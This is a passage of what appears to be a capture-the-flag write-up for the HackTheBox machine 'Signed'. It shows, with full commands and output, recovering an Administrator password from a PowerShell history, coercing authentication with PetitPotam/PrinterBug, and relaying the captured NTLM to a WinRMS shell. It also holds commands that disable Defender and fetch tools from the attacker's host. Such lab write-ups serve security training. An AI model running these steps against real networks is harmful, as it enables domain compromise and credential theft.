-Enabled True ``

-Profile Any ``

-Description "Allow MSSQL access from any IP address"

ls \users\

cd .\Desktop\

notepad root.txt

notepad C:\Users\mssqlsvc\Desktop\user.txt

dir

cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

powershell -command 'Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true'

dir

cd \windows\takss

cd C:\windows\Tasks\

dir

del *

dir

cd \

dir

cd users

cd .\Administrator\Desktop\

notepad cleanup.ps1

cls

$Action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-ExecutionPolicy Bypass -File C:\Users\Administrator\Documents\cleanup.ps1"`

$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 15) -RepetitionDuration (New-TimeSpan -Days 365)`

$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable`

Register-ScheduledTask -TaskName "Clean_DNS_Task" -Action $Action -Trigger $Trigger -Settings $Settings -User "SIGNED\Administrator" -Password "Welcome1"

cd ..\Documents\

notepad restart.ps1

explorer .

dir ..\Desktop\

move ..\Desktop\cleanup.ps1 .

dir ..\Desktop\

dir

Get-NetConnectionProfile

Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset

Set-Service TermService -StartupType disabled

exit

Get-NetConnectionProfile

nltest /dsgetdc:signed.htb

wusa /uninstall /kb:5065428

iwr http://10.10.11.90:81/vmt.exe -O vmt.exe

iwr http://10.10.15.62:81/vmt.exe -O vmt.exe

.\vmt.exe

del .\vmt.exe

manage-bde -off c:\

disable-bitlocker -mountpoint c:\

powershell iwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2024/06/windows10.0-kb5039217-x64_bc72f4ed75c6dd7bf033b823f79533d5772769a3.msu -O update.msu

.\update.msu

del .\update.msu

dir

iwr https://catalog.s.download/windowsupdate.com/c/msdownload/update/software/secu/2025/05/windows10.0-kb5058392-x64_2881b28817b6e714e61b61a50de9f68605f02bd2.msu -O updates.exe

iwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2025/05/windows10.0-kb5058392-x64_2881b28817b6e714e61b61a50de9f68605f02bd2.msu -O updates.exe

.\updates.exe.exe

.\updates.exe

move .\updates.exe .\updates.msu

.\updates.msu

del .\updates.msu
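The cleanup step can be sketched in Python as follows. mssqlclient.py prints the column as a Python bytes literal (b'...'), so one way to recover the text is to parse that literal, decode it, and normalize the line endings. The `clean_bulk_column` helper and the short `SAMPLE` (a few commands from the history above) are my own illustration of the idea, not the exact commands I ran.

```python
import ast


def clean_bulk_column(repr_text: str) -> str:
    """Turn a printed b'...' literal back into readable text."""
    # literal_eval only parses literals, so it is safe on untrusted output.
    raw = ast.literal_eval(repr_text)
    if not isinstance(raw, bytes):
        raise ValueError("expected a bytes literal")
    # Decode and convert Windows line endings to plain newlines.
    return raw.decode("utf-8", errors="replace").replace("\r\n", "\n")


# A short excerpt in the same format as the BulkColumn output.
SAMPLE = r"""b'cd \\\r\ndir\r\nwhoami /all\r\n'"""

if __name__ == "__main__":
    print(clean_bulk_column(SAMPLE))
```

The trailing backticks in the cleaned output are part of the history file itself, marking where a multi-line entry continues onto the next line.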



The history shows:

- Creating multiple groups.

- Creating users (and their passwords).



- Fetching MSSQL from Microsoft’s website and installing it.

- Removing SeImpersonatePrivilege from the MSSQLSERVER service.

- Granting the mssqlsvc user GenericAll over the DNS zone, which will be useful shortly.

- Creating the firewall rules to only allow 1433 inbound.

- Setting WinRM to HTTPS only.

- Creating the flags.

- Creating a cleanup.ps1 script on the Administrator’s Desktop and setting up a scheduled task to run every 15 minutes.

- Resetting the Administrator user’s password!

- Installing Windows updates.
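With a history file this long, a couple of regular expressions can pull out quoted password literals rather than reading line by line. This is a rough sketch under my own assumptions: the two patterns only cover the ConvertTo-SecureString "..." and -Password "..." forms seen in this file, `find_passwords` is a hypothetical helper, and the `SAMPLE` lines are abbreviated from the history above.

```python
import re
from typing import List

# Patterns for the two quoted-password forms that appear in this history file.
PATTERNS = (
    re.compile(r'ConvertTo-SecureString\s+"([^"]+)"'),
    re.compile(r'-Password\s+"([^"]+)"'),
)


def find_passwords(history: str) -> List[str]:
    """Return unique quoted password literals, in pattern order."""
    found: List[str] = []
    for pattern in PATTERNS:
        for match in pattern.finditer(history):
            if match.group(1) not in found:
                found.append(match.group(1))
    return found


# Abbreviated lines from the cleaned history.
SAMPLE = r'''
New-ADUser -Name $u.Username -AccountPassword (ConvertTo-SecureString $u.Password -AsPlainText -Force)
Register-ScheduledTask -TaskName "Clean_DNS_Task" -User "SIGNED\Administrator" -Password "Welcome1"
Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset
'''

if __name__ == "__main__":
    for password in find_passwords(SAMPLE):
        print(password)
```

The variable reference `$u.Password` is deliberately not matched, since it isn’t a literal; the per-user passwords in the hashtable would need a separate pattern.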

The most interesting of course is the Administrator’s password:

Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset

It works:

oxdf@hacky$ proxychains -q netexec smb 127.0.0.1 -u Administrator -p 'Th1s889Rabb!t'

SMB 127.0.0.1 445 DC01 Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\Administrator:Th1s889Rabb!t (Pwn3d!)

oxdf@hacky$ proxychains -q netexec winrm 127.0.0.1 -u Administrator -p 'Th1s889Rabb!t'

WINRM-SSL 127.0.0.1 5986 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)

WINRM-SSL 127.0.0.1 5986 DC01 [+] SIGNED.HTB\Administrator:Th1s889Rabb!t (Pwn3d!)

I’ll note that netexec finds WinRM on port 5986 (HTTPS), not 5985 (HTTP).

I can get a shell with the --ssl option in evil-winrm-py:

oxdf@hacky$ proxychains evil-winrm-py -i 127.0.0.1 -u administrator -p 'Th1s889Rabb!t' --ssl

[proxychains] config file found: /etc/proxychains.conf

[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

[proxychains] DLL init: proxychains-ng 4.17

_ _ _

_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _

/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |

\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |

|_| |__/ v1.5.0

[*] Connecting to '127.0.0.1:5986' as 'administrator'

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:5986 ... OK

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:5986 ... OK

evil-winrm-py PS C:\Users\Administrator\Documents>





via NTLM Relay

Strategy





I’ll use a similar strategy to what I showed in DarkCorp, coercing an authentication attempt from the DC to me using an empty CREDENTIAL_TARGET_INFORMATION structure. This strategy, described in depth in this Synacktiv post, relies on creating a DNS record that points to a host I control without conflicting with the existing DC01 record, but that within Kerberos will be interpreted as if it is DC01. This allows me to act as if I’m DC01.

Generate DNS Record

I’ll use dnstool.py (from krbrelayx) to create a DNS record on the domain with the following options:

- -u 'SIGNED\mssqlsvc' -p 'purPLE9795!@': the user to authenticate as.

- -a add: add a record.

- -r dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA: the name of the record to add.

- -d 10.10.14.16: the IP address the record resolves to (my host).

- 10.129.242.173: the host to send this request to.

It works:

oxdf@hacky$ proxychains uv run dnstool.py -u 'SIGNED\mssqlsvc' -p 'purPLE9795!@' -a add -r dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA -d 10.10.14.16 10.129.242.173

[proxychains] config file found: /etc/proxychains.conf

[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

[proxychains] DLL init: proxychains-ng 4.17

[proxychains] DLL init: proxychains-ng 4.17

[-] Connecting to host...

[-] Binding to host

[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.242.173:389 ... OK

[+] Bind OK

[-] Adding new record

[+] LDAP operation completed successfully
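The record name is just the short hostname with the marshaled blob appended. A small sketch of building it, assuming the suffix is copied verbatim from the command above (the `coercion_record` and `coercion_fqdn` helpers are my own names). It also checks the 63-character limit on a single DNS label, since a long hostname plus the suffix could exceed it.

```python
# Marshaled suffix copied from the dnstool.py command in this post.
MARSHALED_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
MAX_DNS_LABEL = 63  # maximum length of one DNS label


def coercion_record(hostname: str, suffix: str = MARSHALED_SUFFIX) -> str:
    """Build the record name: short hostname followed by the marshaled blob."""
    name = hostname.lower() + suffix
    if len(name) > MAX_DNS_LABEL:
        raise ValueError(f"label is {len(name)} characters, over the DNS limit")
    return name


def coercion_fqdn(hostname: str, domain: str) -> str:
    """Fully qualified form, as passed to the coercion listener option."""
    return f"{coercion_record(hostname)}.{domain}"


if __name__ == "__main__":
    print(coercion_record("dc01"))
    print(coercion_fqdn("dc01", "SIGNED.HTB"))
```

The first value is what goes to dnstool.py with -r, and either form can be given as the listener when coercing.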

I can verify it works using ping from Signed:

SQL (SIGNED\mssqlsvc dbo@master)> xp_cmdshell "ping dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"

output

--------------------------------------------------------------------------------

NULL

Pinging dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.SIGNED.HTB [10.10.14.16] with 32 bytes of data:

Reply from 10.10.14.16: bytes=32 time=22ms TTL=63

Reply from 10.10.14.16: bytes=32 time=22ms TTL=63

Reply from 10.10.14.16: bytes=32 time=22ms TTL=63

Reply from 10.10.14.16: bytes=32 time=22ms TTL=63

NULL

Ping statistics for 10.10.14.16:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 22ms, Maximum = 22ms, Average = 22ms

NULL

It’s sending ICMP to my IP and getting responses.

Note: This DNS record gets cleared every 15 minutes or so, so if it seems to not be working, it’s worth checking that or recreating it.

Coerce

There are several well known methods to coerce authentication from a Windows server to a given target. The netexec module COERCE_PLUS has many built in, so I’ll give that a try. To see if it works, I’ll use Responder.py again:

oxdf@hacky$ proxychains -q netexec smb DC01.signed.htb -u mssqlsvc -p 'purPLE9795!@' -M coerce_plus -o L=dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.SIGNED.HTB

SMB 10.129.242.173 445 DC01 Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 10.129.242.173 445 DC01 [+] SIGNED.HTB\mssqlsvc:purPLE9795!@

COERCE_PLUS 10.129.242.173 445 DC01 VULNERABLE, DFSCoerce

COERCE_PLUS 10.129.242.173 445 DC01 Exploit Success, netdfs\NetrDfsRemoveRootTarget

COERCE_PLUS 10.129.242.173 445 DC01 Exploit Success, netdfs\NetrDfsAddStdRoot

COERCE_PLUS 10.129.242.173 445 DC01 Exploit Success, netdfs\NetrDfsRemoveStdRoot

COERCE_PLUS 10.129.242.173 445 DC01 VULNERABLE, PetitPotam

COERCE_PLUS 10.129.242.173 445 DC01 Exploit Success, efsrpc\EfsRpcAddUsersToFile

COERCE_PLUS 10.129.242.173 445 DC01 VULNERABLE, PrinterBug

COERCE_PLUS 10.129.242.173 445 DC01 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx

COERCE_PLUS 10.129.242.173 445 DC01 VULNERABLE, MSEven

At Responder:

[SMB] NTLMv2-SSP Client : 10.129.242.173

[SMB] NTLMv2-SSP Username : SIGNED\DC01$

[SMB] NTLMv2-SSP Hash : DC01$::SIGNED:dcde56541b29fcda:A79D4C3B21804826EF53238577F98385:01010000000000000021BAE68A93DC

01841843ADB4CA26FF000000000200080054005A004D00570001001E00570049004E002D003700550059005A005900490048004E004600340030000400

3400570049004E002D003700550059005A005900490048004E004600340030002E0054005A004D0057002E004C004F00430041004C000300140054005A

004D0057002E004C004F00430041004C000500140054005A004D0057002E004C004F00430041004C00070008000021BAE68A93DC010600040002000000

0800300030000000000000000000000000400000181F759E902000B736A92CAA0599B51C0AF57386567D493E1138CB5EDF4C9B560A0010000000000000

00000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310036000000000000000000

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

[*] Skipping previously captured hash for SIGNED\DC01$

It worked! I’m able to coerce authentication back to me using the DNS record I created.



Relay

I’ll run ntlmrelayx.py from Impacket to catch the authentication and relay it into a WinRM-based shell with the following options:

- -t winrms://DC01.signed.htb: The target of this attack is WinRM over HTTPS on DC01.

- -smb2support: Without SMB2 support, this can’t work.

oxdf@hacky$ proxychains ntlmrelayx.py -t winrms://DC01.signed.htb -smb2support

[proxychains] config file found: /etc/proxychains.conf

[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

[proxychains] DLL init: proxychains-ng 4.17

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client DCSYNC loaded..

[*] Protocol Client LDAPS loaded..

[*] Protocol Client LDAP loaded..

[*] Protocol Client SMB loaded..

[*] Protocol Client RPC loaded..

[*] Protocol Client SMTP loaded..

[*] Protocol Client IMAPS loaded..

[*] Protocol Client IMAP loaded..

[*] Protocol Client HTTPS loaded..

[*] Protocol Client HTTP loaded..

[*] Protocol Client MSSQL loaded..

[*] Protocol Client WINRMS loaded..

[*] Running in relay mode to single host

[*] Setting up SMB Server on port 445

[*] Setting up HTTP Server on port 80

[*] Setting up WCF Server on port 9389

[*] Setting up RAW Server on port 6666

[*] Setting up WinRM (HTTP) Server on port 5985

[*] Setting up WinRMS (HTTPS) Server on port 5986

[*] Setting up RPC Server on port 135

[*] Multirelay disabled

[*] Servers started, waiting for connections

I’ll need proxychains so that ntlmrelayx.py can connect to 5986 on Signed, as it’s blocked by the firewall directly from my host. Now I’ll coerce again (this time just using PrinterBug to not flood with authentication attempts):

oxdf@hacky$ proxychains -q netexec smb DC01.signed.htb -u mssqlsvc -p 'purPLE9795!@' -M coerce_plus -o L=dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug

SMB 10.129.242.173 445 DC01 Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 10.129.242.173 445 DC01 [+] SIGNED.HTB\mssqlsvc:purPLE9795!@

COERCE_PLUS 10.129.242.173 445 DC01 VULNERABLE, PrinterBug

COERCE_PLUS 10.129.242.173 445 DC01 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx

At ntlmrelayx.py:

[*] (SMB): Received connection from 10.129.242.173, attacking target winrms://DC01.signed.htb

[!] The client requested signing, relaying to WinRMS might not work!

[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01.signed.htb:5986 ... OK

[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01.signed.htb:5986 ... OK

[*] HTTP server returned error code 500, this is expected, treating as a successful login

[*] (SMB): Authenticating connection from /@10.129.242.173 against winrms://DC01.signed.htb SUCCEED [1]

[*] winrms:///@dc01.signed.htb [1] -> Started interactive WinRMS shell via TCP on 127.0.0.1:11000

It started a shell on localhost port 11000. I’ll connect:

oxdf@hacky$ nc localhost 11000

Type help for list of commands

#

help shows a lot of commands:

# help

For more information on a specific command, type HELP command-name

ASSOC Displays or modifies file extension associations.

ATTRIB Displays or changes file attributes.

BREAK Sets or clears extended CTRL+C checking.

BCDEDIT Sets properties in boot database to control boot loading.

CACLS Displays or modifies access control lists (ACLs) of files.

CALL Calls one batch program from another.

CD Displays the name of or changes the current directory.

CHCP Displays or sets the active code page number.

CHDIR Displays the name of or changes the current directory.

CHKDSK Checks a disk and displays a status report.

CHKNTFS Displays or modifies the checking of disk at boot time.

CLS Clears the screen.

CMD Starts a new instance of the Windows command interpreter.

COLOR Sets the default console foreground and background colors.

COMP Compares the contents of two files or sets of files.

COMPACT Displays or alters the compression of files on NTFS partitions.

CONVERT Converts FAT volumes to NTFS. You cannot convert the

current drive.

COPY Copies one or more files to another location.

DATE Displays or sets the date.

DEL Deletes one or more files.

DIR Displays a list of files and subdirectories in a directory.

DISKPART Displays or configures Disk Partition properties.

DOSKEY Edits command lines, recalls Windows commands, and

creates macros.

DRIVERQUERY Displays current device driver status and properties.

ECHO Displays messages, or turns command echoing on or off.

ENDLOCAL Ends localization of environment changes in a batch file.

ERASE Deletes one or more files.

EXIT Quits the CMD.EXE program (command interpreter).

FC Compares two files or sets of files, and displays the

differences between them.

FIND Searches for a text string in a file or files.

FINDSTR Searches for strings in files.

FOR Runs a specified command for each file in a set of files.

FORMAT Formats a disk for use with Windows.

FSUTIL Displays or configures the file system properties.

FTYPE Displays or modifies file types used in file extension

associations.

GOTO Directs the Windows command interpreter to a labeled line in

a batch program.

GPRESULT Displays Group Policy information for machine or user.

GRAFTABL Enables Windows to display an extended character set in

graphics mode.

HELP Provides Help information for Windows commands.

ICACLS Display, modify, backup, or restore ACLs for files and

directories.

IF Performs conditional processing in batch programs.

LABEL Creates, changes, or deletes the volume label of a disk.

MD Creates a directory.

MKDIR Creates a directory.

MKLINK Creates Symbolic Links and Hard Links

MODE Configures a system device.

MORE Displays output one screen at a time.

MOVE Moves one or more files from one directory to another

directory.

OPENFILES Displays files opened by remote users for a file share.

PATH Displays or sets a search path for executable files.

PAUSE Suspends processing of a batch file and displays a message.

POPD Restores the previous value of the current directory saved by

PUSHD.

PRINT Prints a text file.

PROMPT Changes the Windows command prompt.

PUSHD Saves the current directory then changes it.

RD Removes a directory.

RECOVER Recovers readable information from a bad or defective disk.

REM Records comments (remarks) in batch files or CONFIG.SYS.

REN Renames a file or files.

RENAME Renames a file or files.

REPLACE Replaces files.

RMDIR Removes a directory.

ROBOCOPY Advanced utility to copy files and directory trees

SET Displays, sets, or removes Windows environment variables.

SETLOCAL Begins localization of environment changes in a batch file.

SC Displays or configures services (background processes).

SCHTASKS Schedules commands and programs to run on a computer.

SHIFT Shifts the position of replaceable parameters in batch files.

SHUTDOWN Allows proper local or remote shutdown of machine.

SORT Sorts input.

START Starts a separate window to run a specified program or command.

SUBST Associates a path with a drive letter.

SYSTEMINFO Displays machine specific properties and configuration.

TASKLIST Displays all currently running tasks including services.

TASKKILL Kill or stop a running process or application.

TIME Displays or sets the system time.

TITLE Sets the window title for a CMD.EXE session.

TREE Graphically displays the directory structure of a drive or

path.

TYPE Displays the contents of a text file.

VER Displays the Windows version.

VERIFY Tells Windows whether to verify that your files are written

correctly to a disk.

VOL Displays a disk volume label and serial number.

XCOPY Copies files and directory trees.

WMIC Displays WMI information inside interactive command shell.

This is a stateless shell, as I can’t seem to change directories between commands. Still, I can read the flag:

# DIR C:\Users\Administrator\Desktop

Volume in drive C has no label.

Volume Serial Number is BED4-436E

Directory of C:\Users\Administrator\Desktop

10/06/2025 04:04 AM <DIR> .

10/06/2025 04:04 AM <DIR> ..

02/01/2026 05:04 AM 34 root.txt

1 File(s) 34 bytes

2 Dir(s) 6,367,277,056 bytes free

# type C:\Users\Administrator\Desktop\root.txt

2e43af1f************************
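Since the relay shell doesn’t keep a working directory between commands, one workaround is to chain the directory change and the command on a single line. The helper below is a minimal sketch of that idea; the name in_dir is hypothetical, and it assumes each line sent to the shell is handed to cmd.exe (which the help output suggests), so that cd /d and && behave as they do in a normal prompt:

```python
def in_dir(directory: str, command: str) -> str:
    """Build one cmd.exe line that changes directory and then runs a command."""
    # /d also switches drives, the quotes protect paths containing spaces,
    # and && runs the command only if the cd succeeds.
    return f'cd /d "{directory}" && {command}'


# Assumption: the resulting line is pasted into the relay shell as one command.
print(in_dir(r"C:\Users\Administrator\Desktop", "type root.txt"))
```

The printed line can be pasted at the # prompt as is. Using absolute paths, as I do above, avoids the problem entirely for one-off reads.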





via SeImpersonate Restoration

Strategy





When the MSSQL service starts at boot, Windows authenticates the mssqlsvc account and creates a logon session. LSASS stores the token from this initial logon for use during network authentication. Service accounts are granted SeImpersonatePrivilege by default, and MSSQL legitimately uses impersonation to handle client connections under different security contexts, so it’s reasonable to assume the original token has this privilege. As I showed above, the shell as mssqlsvc doesn’t have SeImpersonatePrivilege, which suggests the service is running with a restricted token as a hardening measure.

A 2020 post from Tyranid’s Lair, Sharing a Logon Session a Little Too Much, goes into detail on how to recover this original token using a named pipe. When a client connects to the pipe over SMB, the SMB redirector (running in the kernel) performs authentication using the token stored for the logon session rather than the token of the current process. Impersonating the pipe client then yields the original token.
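To confirm whether a recovered token actually differs from the restricted one, it helps to compare whoami /priv output before and after. The snippet below is a rough sketch of that check, not part of the original workflow: parse_privileges is a hypothetical helper, and SAMPLE is a made-up listing in the standard whoami /priv layout, not output captured from Signed.

```python
def parse_privileges(whoami_output: str) -> dict[str, str]:
    """Map each privilege name in `whoami /priv` output to its state."""
    privileges = {}
    for line in whoami_output.splitlines():
        fields = line.split()
        # Privilege rows start with a name like SeXxxPrivilege and end with the state.
        if len(fields) >= 2 and fields[0].startswith("Se") and fields[0].endswith("Privilege"):
            privileges[fields[0]] = fields[-1]
    return privileges


# Made-up sample in the usual `whoami /priv` layout (an assumption, not box output).
SAMPLE = """\
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

privs = parse_privileges(SAMPLE)
print("SeImpersonatePrivilege" in privs)  # False for this sample
```

A privilege that is missing from the listing has been removed from the token, which is different from one that is present but Disabled and can still be enabled.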















Build Module







The post uses the NtObjectManager PowerShell module from the sandbox-attacksurface-analysis-tools repo, which depends on DLLs that have to be compiled before it will work. I’ll clone the repo to a Windows host and open the .sln file in Visual Studio. I’ll set the configuration to Release:

And then Build -> Build Solution to compile everything:

I’ll zip bin/release, transfer it to my hacking VM, and upload it to Signed:

PS C:\programdata> iwr http://10.10.14.16/Release.zip -outfile release.zip

PS C:\programdata> expand-archive release.zip -destinationpath .

PS C:\programdata> ls release

Directory: C:\programdata\release

Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 2/1/2026 11:14 AM en-US

-a---- 2/1/2026 2:10 PM 17165 AppModelFunctions.ps1

-a---- 2/1/2026 2:10 PM 66048 Be.Windows.Forms.HexBox.dll

-a---- 2/1/2026 2:10 PM 27852 Be.Windows.Forms.HexBox.pdb

-a---- 2/1/2026 2:10 PM 16255 DsFunctions.ps1

-a---- 2/1/2026 2:10 PM 86528 EditSection.exe

-a---- 2/1/2026 2:10 PM 176 EditSection.exe.config

-a---- 2/1/2026 2:10 PM 14572 EditSection.pdb

-a---- 2/1/2026 2:10 PM 46461 FirewallFunctions.ps1

-a---- 2/1/2026 2:10 PM 207943 Formatters.ps1xml

-a---- 2/1/2026 2:10 PM 54773 KerberosFunctions.ps1

-a---- 2/1/2026 2:10 PM 51381 LsaFunctions.ps1

-a---- 2/1/2026 2:10 PM 7162 MiscFunctions.ps1

-a---- 1/6/2011 4:24 PM 22016 NDesk.Options.dll

-a---- 2/1/2026 2:10 PM 3477504 NtCoreLib.dll

-a---- 2/1/2026 2:10 PM 35840 NtCoreLib.Forms.dll

-a---- 2/1/2026 2:10 PM 7204 NtCoreLib.Forms.pdb

-a---- 2/1/2026 2:10 PM 10923 NtCoreLib.Forms.xml

-a---- 2/1/2026 2:10 PM 946312 NtCoreLib.pdb

-a---- 2/1/2026 2:10 PM 3307162 NtCoreLib.xml

-a---- 2/1/2026 2:10 PM 16239 NtDeviceFunctions.ps1

-a---- 2/1/2026 2:10 PM 39814 NtFileFunctions.ps1

-a---- 2/1/2026 2:10 PM 8705 NtKeyFunctions.ps1

-a---- 2/1/2026 2:10 PM 12335 NtObjectFunctions.ps1

-a---- 2/1/2026 2:10 PM 499200 NtObjectManager.dll

-a---- 2/1/2026 2:10 PM 5894567 NtObjectManager.dll-Help.xml

-a---- 2/1/2026 2:10 PM 162024 NtObjectManager.pdb

-a---- 2/1/2026 2:10 PM 19353 NtObjectManager.psd1

-a---- 2/1/2026 2:10 PM 1868 NtObjectManager.psm1

-a---- 2/1/2026 2:10 PM 632927 NtObjectManager.xml

-a---- 2/1/2026 2:10 PM 23372 NtProcessFunctions.ps1

-a---- 2/1/2026 2:10 PM 14096 NtSectionFunctions.ps1

-a---- 2/1/2026 2:10 PM 99709 NtSecurityFunctions.ps1

-a---- 2/1/2026 2:10 PM 8421 NtSystemInfoFunctions.ps1

-a---- 2/1/2026 2:10 PM 7033 NtThreadFunctions.ps1

-a---- 2/1/2026 2:10 PM 50604 NtTokenFunctions.ps1

-a---- 2/1/2026 2:10 PM 11821 NtVirtualMemoryFunctions.ps1

-a---- 2/1/2026 2:10 PM 7748 NtWindowFunctions.ps1

-a---- 2/1/2026 2:10 PM 68169 RpcFunctions.ps1

-a---- 2/1/2026 2:10 PM 14320 SamFunctions.ps1

-a---- 2/1/2026 2:10 PM 7781 SocketFunctions.ps1

-a---- 3/7/2019 4:07 PM 354304 System.Management.Automation.dll

-a---- 2/1/2026 2:10 PM 261632 TokenViewer.exe

-a---- 2/1/2026 2:10 PM 176 TokenViewer.exe.config

-a---- 2/1/2026 2:10 PM 35012 TokenViewer.pdb

-a---- 2/1/2026 2:10 PM 435 TypeExtensions.ps1xml

-a---- 2/1/2026 2:10 PM 19640 UtilityFunctions.ps1

-a---- 2/1/2026 2:10 PM 18432 ViewSecurityDescriptor.exe

-a---- 2/1/2026 2:10 PM 176 ViewSecurityDescriptor.exe.config

-a---- 2/1/2026 2:10 PM 2388 ViewSecurityDescriptor.pdb

-a---- 10/23/2018 8:52 PM 316392 WeifenLuo.WinFormsUI.Docking.dll

-a---- 2/1/2026 2:10 PM 6983 Win32DebugFunctions.ps1

-a---- 2/1/2026 2:10 PM 17663 Win32ModuleFunctions.ps1

-a---- 2/1/2026 2:10 PM 17155 Win32ProcessFunctions.ps1

-a---- 2/1/2026 2:10 PM 11471 Win32SecurityFunctions.ps1

-a---- 2/1/2026 2:10 PM 20276 Win32ServiceFunctions.ps1

I’ll import the module:

PS C:\programdata> cd release

PS C:\programdata\release> import-module .\NtObjectManager.psm1

Get Token

Now I’ll run through the steps in the post. First I’ll create a pipe and start a job with that pipe listening:

PS C:\programdata> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path

PS C:\programdata> $job = Start-Job { $pipe.Listen() }

PS C:\programdata> $job